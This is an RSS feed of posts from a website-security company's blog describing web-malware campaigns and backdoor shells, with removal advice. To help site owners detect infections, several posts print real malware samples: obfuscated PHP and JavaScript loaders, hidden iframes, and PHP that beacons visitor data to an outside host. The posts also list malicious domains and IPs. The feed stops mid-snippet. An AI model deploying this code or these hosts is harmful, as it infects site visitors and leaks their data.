<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>stopthehacker.com &#187; blacklisting</title>
	<atom:link href="http://www.stopthehacker.com/tag/blacklisting/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.stopthehacker.com</link>
	<description>Jaal, LLC</description>
	<lastBuildDate>Tue, 07 Feb 2012 14:00:27 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Experts explain: Hidden Backdoors</title>
		<link>http://www.stopthehacker.com/2012/02/07/experts-explain-hidden-backdoors/</link>
		<comments>http://www.stopthehacker.com/2012/02/07/experts-explain-hidden-backdoors/#comments</comments>
		<pubDate>Tue, 07 Feb 2012 14:00:27 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[blacklisting]]></category>
		<category><![CDATA[c100]]></category>
		<category><![CDATA[c99]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[r57]]></category>
		<category><![CDATA[shell]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=3322</guid>
		<description><![CDATA[This is the fourth part in a series of posts here at StopTheHacker where we describe the various methods that malicious hackers use to infect benign and legitimate websites with web-malware. In this article we will talk about one of the most common attack methods used to infect benign websites: Hidden Backdoor shells. This particular [...]]]></description>
			<content:encoded><![CDATA[<p>This is the fourth part in a series of posts here at StopTheHacker where we describe the various methods that malicious hackers use to infect benign and legitimate websites with web-malware. In this article we will talk about one of the most common attack methods used to infect benign websites: Hidden Backdoor shells. This particular technique is akin to planting a spy inside an organization. The spy can help you do activities without anyone noticing. Using backdoor shells to keep accessing compromised sites repeatedly in order to keep using them as a forward base to launch attacks and infect more websites is an old trick, but is still very prevalent. In this article we will delve into some detail about backdoor shells, how to protect yourself and your website from this kind of an attack, and best practice strategies.</p>
<p><strong>What is a Backdoor Shell</strong> </p>
<p>A backdoor shell is a piece of computer software that is inserted without the knowledge and permission of a website owner into the hosting account. This software is usually a standalone file and contains commands written in PHP (a computer programming language). These backdoor shells can allow malicious hackers to connect to compromised websites whenever they would like to. Its like having a sleeper agent inside an organization that you can wake up whenever you want want and make them do bad things on your behalf. These backdoor shells can be used to infect webpages, use a compromised hosting account to send out spam email, install phishing pages and much more.</p>
<p><strong>Why were these shells developed</strong></p>
<p>The backdoor shells were initially developed for debugging, testing and security research purposes. For example, consider a really popular backdoor shell call phpshell. This piece of software is written completely in PHP, is stand alone, needing no support from any installation process. This shell can be placed on a website and an admin can use it to check disk space, folder contents and more details about the hosting account. However, these shells are also used by security researcher to test whether they can gain access into internal systems, scan internal infrastructure and more. Unfortunately, malicious hackers love the flexibility and power provided by these shells and have also taken a liking to them, and now use them in a prolific manner to infect websites.  </p>
<p><strong>How are these shells used by malicious hackers</strong></p>
<p>Malicious hackers will install these backdoor shells by exploiting a vulnerability on a website (usually a web app vulnerability like XSS or SQL injection) or by using stolen FTP credentials. Once these shells are installed deep within random subdirectories inside a hosting account, it becomes tricky to hunt them down and delete them. Once installed, the malicious hacker knows the exact URL with which they can acces this hidden backdoor shell and can navigate to it by means of a simple web browser. Once they can get access to this shell, they can execute commands to check files, modify them, check various parameters and what not. </p>
<p><strong>What do these shells look like</strong> </p>
<p>We present some examples of these shells below, primarily c99, c100, r57 and php shells. Notice that all of them allow you to have fine grained control over the hosting account that has been compromised.</p>
<div id="attachment_3332" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.stopthehacker.com/wp-content/uploads/2012/02/c100.png" rel="lightbox[3322]" title="c100"><img src="http://www.stopthehacker.com/wp-content/uploads/2012/02/c100-300x187.png" alt="" title="c100" width="300" height="187" class="size-medium wp-image-3332" /></a><p class="wp-caption-text">c100 shell</p></div>
<div id="attachment_3331" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.stopthehacker.com/wp-content/uploads/2012/02/r57.jpg" rel="lightbox[3322]" title="r57"><img src="http://www.stopthehacker.com/wp-content/uploads/2012/02/r57-300x201.jpg" alt="r57 shell" title="r57" width="300" height="201" class="size-medium wp-image-3331" /></a><p class="wp-caption-text">r57 shell</p></div>
<div id="attachment_3330" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.stopthehacker.com/wp-content/uploads/2012/02/c99.png" rel="lightbox[3322]" title="c99"><img src="http://www.stopthehacker.com/wp-content/uploads/2012/02/c99-300x203.png" alt="c99 shell" title="c99" width="300" height="203" class="size-medium wp-image-3330" /></a><p class="wp-caption-text">c99 shell</p></div>
<p>As you can see for each of these shells, the malicious hacker has complete control over most functions of a hosting account. They can list files, modify them, install software, launch attacks and basically exploit the hosting account to do whatever they would like.</p>
<p><strong>How can I identify these shells</strong></p>
<p>These shells can be identified by virtue of the functionality they explose to the malicious hackers. For e.g. If you can search for strings like &#8220;c99shell&#8221;, &#8220;pre-release&#8221;, &#8220;uname-a&#8221; &#8220;safe-mode&#8221; inside php files that are present in your hosting account then you will be able to get hold of these malicious files. </p>
<p><strong>How to detect if your site is vulnerable</strong><br />
Find out if your website is sending out spam emails or phishing emails or participating in the malware distribution network on the Internet. You should check your website name with various spam and phsihing databases like Spamcop and Phishtank to find out if any such emails have been reported from your webserver or not. You should also find out if your website is serving up malware to unsuspecting visitors. These are all tell tale signs of the fact that there is a backdoor inserted inside your hosting account.</p>
<p>Additionally, you should find out if your website has application level vulnerabilities such as SQL injcetion and Cross Site Scripting issues, These are all security holes that malicious hackers can exploit to break into your site and install backdoor shells.</p>
<p><strong>Conclusion</strong><br />
Backdoor shells are a common vector for malicious hackers to exploit and infect websites. We have seen what these shells are, how they are used by malicious hackers, and how to protect your website.</p>
<p>StopTheHacker.com customers have access to resources and services that protect them against these kind of threats and help them recover from compromises should they occur. If you would like more information on how to protect your website, please feel free to <a href="http://www.stopthehacker.com/contact/">contact us</a>. You can also visit our <a href="http://www.stopthehacker.com/services/">services page</a> to protect your website right now.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2012/02/07/experts-explain-hidden-backdoors/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DragosImport, Domboware Attacks</title>
		<link>http://www.stopthehacker.com/2011/12/05/dragosimportdomboware-attacks/</link>
		<comments>http://www.stopthehacker.com/2011/12/05/dragosimportdomboware-attacks/#comments</comments>
		<pubDate>Mon, 05 Dec 2011 16:00:25 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[blacklisting]]></category>
		<category><![CDATA[domboware]]></category>
		<category><![CDATA[dragosimport]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=3191</guid>
		<description><![CDATA[In the recent weeks, two websites have been used increasingly to mount attacks on unsuspecting visitors of legitimate, benign, sites compromised by malicious hackers. We will discuss the details of these distribution sites in our post. Is my site infected? First, to determine if your site has been compromised by the infections mentioned here, search [...]]]></description>
			<content:encoded><![CDATA[<p>In the recent weeks, two websites have been used increasingly to mount attacks on unsuspecting visitors of legitimate, benign, sites compromised by malicious hackers. We will discuss the details of these distribution sites in our post.</p>
<p><strong>Is my site infected?</strong><br />
First, to determine if your site has been compromised by the infections mentioned here, search your website hosting directory for the following two lines of malware.</p>
<pre class="brush: plain; title: ; notranslate">
script src=hxxp://dragosimport.com/js/
script src=hxxp://domboware.hu/js/
</pre>
<p>We have also found the following PHP code on websites infected by these two scripts. Use grep (or wingrep) to search for the PHP code listed below.</p>
<pre class="brush: php; title: ; notranslate">
@error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = &quot;7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs
[snipped]
 $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = &quot;&quot;;$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = &quot;\x73\164\x72\x65\143\x72\160\164\x72&quot;;$eva1tYlbakBcVSir = &quot;\x67\141\x6f\133\x70\170\x65&quot;;$eva1tYldakBoVS1r = &quot;\x65\143\x72\160&quot;;$eva1tYldakBcVSir = &quot;&quot;;$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?&gt;
</pre>
<p>One such site hosting this malware is nchr.org. Interestingly, many of the sites infected are running osCommerce. We will provide more detail on the vulnerability exploited in an upcoming post.</p>
<p><strong>Which sites are aiding the attack?</strong><br />
The list below includes sites participating in the distribution of the malware thus far.</p>
<pre class="brush: plain; title: ; notranslate">
www.cledwilliams.co.uk
decohouz.com
www.scanstore.nl
www.blackmoresnight.com
www.ldguideservice.com
</pre>
<p><strong>How do I protect my site?</strong><br />
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.</p>
<p>StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to <a href="http://www.stopthehacker.com/contact/">contact us</a>. You can also visit our <a href="http://www.stopthehacker.com/services/">services page</a> to protect your website right now.</p>
<p>Till next time&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2011/12/05/dragosimportdomboware-attacks/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Willysy Injection Attacks</title>
		<link>http://www.stopthehacker.com/2011/12/01/willysy-injection-attacks/</link>
		<comments>http://www.stopthehacker.com/2011/12/01/willysy-injection-attacks/#comments</comments>
		<pubDate>Thu, 01 Dec 2011 16:00:23 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[blacklisting]]></category>
		<category><![CDATA[iframe]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[willysy]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=3181</guid>
		<description><![CDATA[Code injection attacks are now affecting millions of websites on the Internet. It is no longer an option to leave your website unprotected. We will be discussing the major outbreak of the &#8220;willysy.com&#8221; injection attacks in this article that at one time affected more than 100,000 websites. What is the Willysy attack? This particular code [...]]]></description>
			<content:encoded><![CDATA[<p>Code injection attacks are now affecting millions of websites on the Internet. It is no longer an option to leave your website unprotected.</p>
<p>We will be discussing the major outbreak of the &#8220;willysy.com&#8221; injection attacks in this article that at one time affected more than 100,000 websites.</p>
<p><strong>What is the Willysy attack?</strong><br />
This particular code injection attack leads to the injection of malicious Iframes by malicious hackers into benign websites. The Iframe is an HTML element that can be used to load content from a different website into the pages on your own website. Think of it as a shipping container that fits like a lego block on your ship, and the container can contain cargo from a source that you have no control over.</p>
<p>This Iframe element is used to load malware content from exploit sites after a benign website is compromised and an iframe is injected and embedded inside the webpage. When trusting visitors view these webpages, they are infected with the malware.</p>
<p><strong>What vulnerabilities are being exploited?</strong><br />
osCommerce sites are being targeted primarily with this attack and the following vulnerabilities in osCommerce are being exploited:</p>
<ul>
<li><a href="http://www.1337day.com/exploits/16505" target="_blank">osCommerce Remote Edit Site Info Vulnerability</a></li>
<li><a href="http://www.exploit-db.com/exploits/12801/" target="_blank">osCommerce Online Merchant v2.2 File Disclosure And Admin ByPass</a></li>
</ul>
<p>These exploits are used to infect benign, legitimate, sites. Once the malware is injected onto these exploited sites, the visitors to these sites are infected by various mechanisms used to install the malware on the visitors machine. Some of the mechanisms used to infect the visitors computer involve browser exploits like the ones listed below.</p>
<pre class="brush: plain; title: ; notranslate">
CVE-2010-1885
CVE-2010-0886
CVE-2010-0188
CVE-2006-0003
</pre>
<p><strong>Is my website infected?</strong><br />
In order to determine whether your website is infected or not, search for instances of the malware listed below using tools like grep (or wingrep) or have StopTheHacker&#8217;s <a href="http://www.stopthehacker.com/services/health-monitoring/">Health Monitoring</a> service do it for you.</p>
<p>Search for the following malware:</p>
<pre class="brush: xml; title: ; notranslate">
&lt;iframe src='hxxp://willysy.com/images/banners/' style='position:absolute;visibility:hidden'&gt;&lt;/iframe&gt;
</pre>
<p>Search for the following malware closely associated with the willysy.com infection:</p>
<pre class="brush: xml; title: ; notranslate">
&lt;script src=hxxp://exero.eu/catalog/jquery.js&gt;&lt;/script&gt;
</pre>
<p>If you see an occurrence of this malware on your website, your website has been compromised. You will need to clean up the infection by deleting the instances of the malware from your webpages.</p>
<p>Another indication of infection is to search your server log files for accesses from the IP addresses below. If you do find these IP addresses in your log files, you should pay special attention to determining whether your site has been compromised or not.</p>
<pre class="brush: plain; title: ; notranslate">
178.217.163.214
178.217.165.111
178.217.165.71
</pre>
<p>Additionally, if your site is using osCommerce you should be even more alert. Since this infection seems to be more prevalent amongst osCommerce websites, please download the latest version of <a href="http://www.oscommerce.com/solutions/downloads">osCommerce</a> and ensure that the permissions of your admin folders are set correctly (to 644 or something more restrictive).</p>
<p><strong>Which sites are aiding the attack?</strong><br />
The below list includes sites used to spread the malware thus far.</p>
<pre class="brush: plain; title: ; notranslate">
hxxp://arhyv.ru/
hxxp://papucky.eu/ext/
hxxp://counv.ru/
hxxp://adeportes.es/
hxxp://labource.ru/
hxxp://gooqlepics.com/include.js
hxxp://yandekapi.com/
</pre>
<p><strong>Who owns these malicious sites?</strong><br />
The registrant for the malware disctibution site arhyv.ru is:</p>
<pre class="brush: plain; title: ; notranslate">
leshkinaira@yahoo.com
</pre>
<p><em>Source: Forum entry at <a href="http://www.dslreports.com/forum/r26151317-willysy-.com-Mass-Injection-1-million-infected-sites">DSLreports.com</a>.</em></p>
<p><strong>How do I protect my site?</strong><br />
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.</p>
<p>StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to <a href="http://www.stopthehacker.com/contact/">contact us</a>. You can also visit our <a href="http://www.stopthehacker.com/services/">services page</a> to protect your website right now.</p>
<p>Till next time&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2011/12/01/willysy-injection-attacks/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Simple Machines Malware</title>
		<link>http://www.stopthehacker.com/2011/11/08/simplemachine-malware/</link>
		<comments>http://www.stopthehacker.com/2011/11/08/simplemachine-malware/#comments</comments>
		<pubDate>Tue, 08 Nov 2011 16:00:21 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[blacklisting]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[simplemachines]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=3107</guid>
		<description><![CDATA[Simple Machines is a forum software used by thousands of website owners around the world to build online communities into their websites. Unfortunately, it is a perfect target for malicious hackers too. Finding a way to compromise the Simple Machines installation to inject malware into a legitimate website thereby infecting its visitors is an attractive [...]]]></description>
			<content:encoded><![CDATA[<p>Simple Machines is a forum software used by thousands of website owners around the world to build online communities into their websites. Unfortunately, it is a perfect target for malicious hackers too. Finding a way to compromise the Simple Machines installation to inject malware into a legitimate website thereby infecting its visitors is an attractive proposition for malicious hackers.</p>
<p>This post will detail a fast-growing new strain of malware that has targeted Simple Machines enabled websites. At the time of posting, close to 30,000 websites have been infected with this malware. We detail the attack below. </p>
<p><strong>The malware</strong><br />
This malware is primarily found in the form of a script element that contains the various commands to infect the website visitor.</p>
<p>Interestingly, this malware also creates an Iframe element that loads additional malware from an external website. Notice the Iframe element at the end of the sample below (this creates a link to m-e.crossfitharlem.net).</p>
<p>Malware sample (JavaScript):</p>
<pre class="brush: jscript; title: ; notranslate">
&lt;script&gt;b=new function(){return 2;};try{app[1][2]}catch(q){ss=&quot;&quot;;}try{gberbger-2;}catch(q){s=String;}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.asd='e';if('e'==={}.asd)a=document['createTextNode']('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n='4.5a4.5a52.5a51a16a20a50a55.5a49.5a58.5a54.5a50.5a55a58a23a51.5a50.5a58a34.5a54a50.5a54.5a50.
5a55a58a57.5a33a60.5a42a48.5a51.5a39a48.5a57.5a58a24.5a19.5a16a59.5a52.5a50a58a52a30.5a19.5a24.
5a24a19.5a16a52a50.5a52.5a51.5a52a58a30.5a19.5a24.5a24a19.5a16a57.5a58a60.5a54a50.5a30.5a19.5a59a52.
5a57.5a52.5a49a52.5a54a52.5a58a60.5a29a52a52.5a50a50a50.5a55a29.5a56a55.5a57.5a52.5a58a52.5a55.
5a55a29a48.5a49a57.5a55.5a54a58.5a58a50.5a29.5a54a50.5a51a58a29a24a29.5a58a55.5a56a29a24a29.5a19.5a31a30a23.5a52.5a51a57a48.5a54.5a50.5a31a17a20.5a29.5a4.5a4.5a62.5a4.5a4.5a51a58.5a55a49.5a58a52.5a55.5a55a16a52.5a51a57a48.5a54.5a50.5a57a20a20.5a61.5a4.5a4.5a4.5a59a48.5a57a16a51a16a30.5a16a50a55.5a49.5a58.5a54.5a50.5a55a58a23a49.5a57a50.5a48.5a58a50.5a34.5a54a50.5a54.5a50.5a55a58a20a19.5a52.5a51a57a48.5a54.5a50.5a19.5a20.5a29.5a51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a57.5a57a49.5a19.5a22a19.5a52a58a58a56a29a23.5a23.5a54.5a22.5a50.5a23a49.5a57a55.5a57.5a57.5a51a52.5a58a52a48.5a57a54a50.5a54.5a23a55a50.5a58a23.5a61a23.5a57.5a58a24.5a19.5a20.5a29.5a51a23a57.5a58a60.5a54a50.5a23a59a52.5a57.5a52.5a49a52.5a54a52.5a58a60.5a30.5a19.5a52a52.5a50a50a50.5a55a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a56a55.5a57.5a52.5a58a52.5a55.5a55a30.5a19.5a48.5a49a57.5a55.5a54a58.5a58a50.5a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a54a50.5a51a58a30.5a19.5a24a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a58a55.5a56a30.5a19.5a24a19.5a29.5a51a23a57.
5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a59.5a52.5a50a58a52a19.5a22a19.5a24.5a24a19.5a20.5a29.5a51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a52a50.5a52.5a51.5a52a58a19.5a22a19.5a24.5a24a19.5a20.5a29.5a4.5a4.5a4.5a50a55.5a49.5a58.5a54.5a50.5a55a58a23a51.5a50.5a58a34.5a54a50.5a54.5a50.5a55a58a57.5a33a60.5a42a48.5a51.5a39a48.5a54.5a50.5a20a19.5a49a55.5a50a60.5a19.5a20.5a45.5a24a46.5a23a48.5a56a56a50.5a55a50a33.5a52a52.5a54a50a20a51a20.5a29.5a4.5a4.5a62.5';n=n
['split']('a');for(i=0;i!=n.length;i++)if(!+b)ss+=s.fromCharCode(-h*eval(&quot;n&quot;+&quot;[i]&quot;));if(a.nodeValue==321)eval(ss);&lt;/script&gt;&lt;iframe style=&quot;visibility:
hidden; position: absolute; left: 0pt; top: 0pt;&quot; src=&quot;hxxp://m-e.crossfi tha rlem.net/z/st1&quot; height=&quot;10&quot; width=&quot;10&quot;&gt;&lt;/iframe&gt;&lt;/body&gt;&lt;/html&gt;
</pre>
<p><strong>What does the malware do?</strong><br />
Malicious code (PHP) like that below has been found on the compromised websites.</p>
<p>The code executes in two phases:</p>
<ol>
<li>The code below transfers information (user agent, IP address, etc&#8230;) to conqstat.com.</li>
<li>The Javascript mentioned above is returned as a reply.</li>
</ol>
<p>Malware sample (PHP):</p>
<pre class="brush: php; title: ; notranslate">
&lt;?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = &quot;&quot;;
    if((strstr($sUserAgent, 'google') == false)&amp;&amp;(strstr($sUserAgent, 'yahoo') == false)&amp;&amp;(strstr($sUserAgent, 'baidu') == false)&amp;&amp;(strstr($sUserAgent, 'msn') == false)&amp;&amp;(strstr($sUserAgent, 'opera') == false)&amp;&amp;(strstr($sUserAgent, 'chrome') == false)&amp;&amp;(strstr($sUserAgent, 'bing') == false)&amp;&amp;(strstr($sUserAgent, 'safari') == false)&amp;&amp;(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true &amp;&amp; isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
        $stCurlLink = base64_decode( 'aHR0cDovL2NvbnFzdGF0LmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&amp;useragent='.urlencode($sUserAgent).'&amp;domainname='.urlencode($_SERVER['HTTP_HOST']).'&amp;fullpath='.urlencode($_SERVER['REQUEST_URI']).'&amp;check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
[snipped...]
?&gt;
</pre>
<p><strong>How do I protect my site?</strong><br />
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.</p>
<p>StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to <a href="http://www.stopthehacker.com/contact/">contact us</a>. You can also visit our <a href="http://www.stopthehacker.com/services/">services page</a> to protect your website now.</p>
<p>Till next time&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2011/11/08/simplemachine-malware/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>nl.ai p,a,c,k,e,d Malware</title>
		<link>http://www.stopthehacker.com/2011/11/07/nl-ai-packed-malware/</link>
		<comments>http://www.stopthehacker.com/2011/11/07/nl-ai-packed-malware/#comments</comments>
		<pubDate>Tue, 08 Nov 2011 00:00:16 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[blacklisting]]></category>
		<category><![CDATA[dean edwards]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[packed]]></category>
		<category><![CDATA[packer]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=3132</guid>
		<description><![CDATA[Malicious hackers are continuing to find new ways to infect benign websites. A recent spate of attacks on WordPress powered sites proves this more strongly than ever. One popular method for infecting WordPress powered websites is to infect a file called &#8220;wp-settings.php&#8221;. The malware is then spread from this file to all subsequent requests for [...]]]></description>
			<content:encoded><![CDATA[<p>Malicious hackers are continuing to find new ways to infect benign websites. A recent spate of attacks on WordPress powered sites proves this more strongly than ever. </p>
<p>One popular method for infecting WordPress powered websites is to infect a file called &#8220;wp-settings.php&#8221;. The malware is then spread from this file to all subsequent requests for webpages on the compromised website.</p>
<p><strong>The malware</strong><br />
Usually the malware shown below will appear at the top of the page in the <head> section of a webpage. Please check your source code.</p>
<p>Malware sample:</p>
<pre class="brush: jscript; title: ; notranslate">
&lt;script&gt;eval(function(p,a,c,k,e,d){e=function(c){return(c&lt;a?'':e(parseInt(c/a)))+((c=c%a)&gt;35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){
...snipped..
t=u(&quot;9()&quot;,y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie |toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|ph
&lt;/script&gt;
</pre>
<p><strong>Steps to remove the malware</strong></p>
<ol>
<li>Access your hosting account SSH or SFTP</li>
<li>Remove the malware inserted into the file &#8220;wp_inc/upd.php&#8221; located in your &#8220;/tmp&#8221; folder or in your WordPress installation directory. NOTE: Some of our readers have reported that the malware can also reside in a file called revisions-js.php, so please search in this file too. (Thanks to our readers! )</li>
<li>Remove the following code from the file &#8220;wp-settings.php&#8221;, usually found in your WordPress installation directory</li>
</ol>
<pre class="brush: jscript; title: ; notranslate">
function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . ‘/wp_inc’)){
readfile($t_d . ‘/wp_inc’);
}
}
add_action(‘wp_head’, ‘check_wordpress’);
do_action( ‘init’ );
</pre>
<p><strong>What does the malware do?</strong><br />
Th injected PHP code causes your WordPress installation to load the malware located inside a file named &#8220;wp_inc/upd.php&#8221; (usually in your &#8220;/tmp&#8221; folder). The malware then builds an Iframe element pointing to one of many different websites.</p>
<p>Malware destination sites:</p>
<pre class="brush: plain; title: ; notranslate">
hxxp://juyfdjhdjdgh.nl.ai/showthread.php
hxxp://myftp.org/
hxxp://coom.in/
</pre>
<p><strong>How did this happen?</strong><br />
One of the primary vectors for an attack like this one is stolen user credentials. Do not store your user name and passwords in your FTP client or other similar applications like FileZilla.</p>
<p>Additionally, make sure your WordPress install is up-to-date and that all third party plugins, like timthumb are updated too.</p>
<p><strong>How do I protect my site?</strong><br />
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.</p>
<p>StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to <a href="http://www.stopthehacker.com/contact/">contact us</a>. You can also visit our <a href="http://www.stopthehacker.com/services/">services page</a> to protect your website now.</p>
<p>Till next time&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2011/11/07/nl-ai-packed-malware/feed/</wfw:commentRss>
		<slash:comments>17</slash:comments>
		</item>
		<item>
		<title>osCommerce Attacks</title>
		<link>http://www.stopthehacker.com/2011/11/07/oscommerce-hacks/</link>
		<comments>http://www.stopthehacker.com/2011/11/07/oscommerce-hacks/#comments</comments>
		<pubDate>Mon, 07 Nov 2011 19:50:37 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[blacklist]]></category>
		<category><![CDATA[blacklisting]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[oscommerce]]></category>
		<category><![CDATA[php]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=3099</guid>
		<description><![CDATA[Malicious hackers are always looking to exploit software used by website owners to power their websites. One popular type of application that malicious hackers target is shopping carts, like osCommerce. This allows them to compromise a large number of websites using the software, infecting the visitors to these sites with malware. We have described how [...]]]></description>
			<content:encoded><![CDATA[<p>Malicious hackers are always looking to exploit software used by website owners to power their websites. One popular type of application that malicious hackers target is shopping carts, like osCommerce. This allows them to compromise a large number of websites using the software, infecting the visitors to these sites with malware. </p>
<p>We have described how malicious hackers exploit osCommerce installations in a past <a href="http://www.stopthehacker.com/2011/04/19/oscommerce-malware/">article</a>. This post details a new piece of malware that is affecting osCommerce websites.</p>
<p><strong>The attack</strong><br />
Shopping carts like osCommerce are prime targets for malicious hackers since they are widely used, store a plethora of sensitive information, and are prime vector to embed malware on a website to infect visitors and customers.</p>
<p>A recent trend is to display fake Anti-Virus pop up advertisements to visitors of a site when they land on an infected webpage. The following websites are being used to distribute the fake Anti-Virus malware.</p>
<p>Sites distributing the malware:</p>
<pre class="brush: plain; title: ; notranslate">
roybeth.com
schenkenbrunn.at
puremojofoto.com
pindating.com
nadobolchetrafa.cx.cc
</pre>
<p><strong>Compromised websites in the wild</strong><br />
One example of a site infected with this specific malware is: www.surfmonster.co.uk. Take a look at the code below to see how the malware has been appended to the JavaScript.</p>
<p>A sample of the actual malware:</p>
<pre class="brush: jscript; title: ; notranslate">
i,s,ss=&quot;http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js”,ss=&quot;http://roybeth.com/ext/jquery.php&quot;;try { s=document.createElement(&quot;script&quot;); s.src=ss; document.body.appendChild( s ); } catch(erst){ }
</pre>
<p>A more detailed description of how the malware is appended is presented in one of our <a href="http://www.stopthehacker.com/2009/10/28/when-benign-scripts-attack/">previous posts</a>.</p>
<pre class="brush: jscript; title: ; notranslate">
      this.hook.enabled = 1;

        // Cache so updates are infrequent.
        tiles.old = {
                w: elmW,
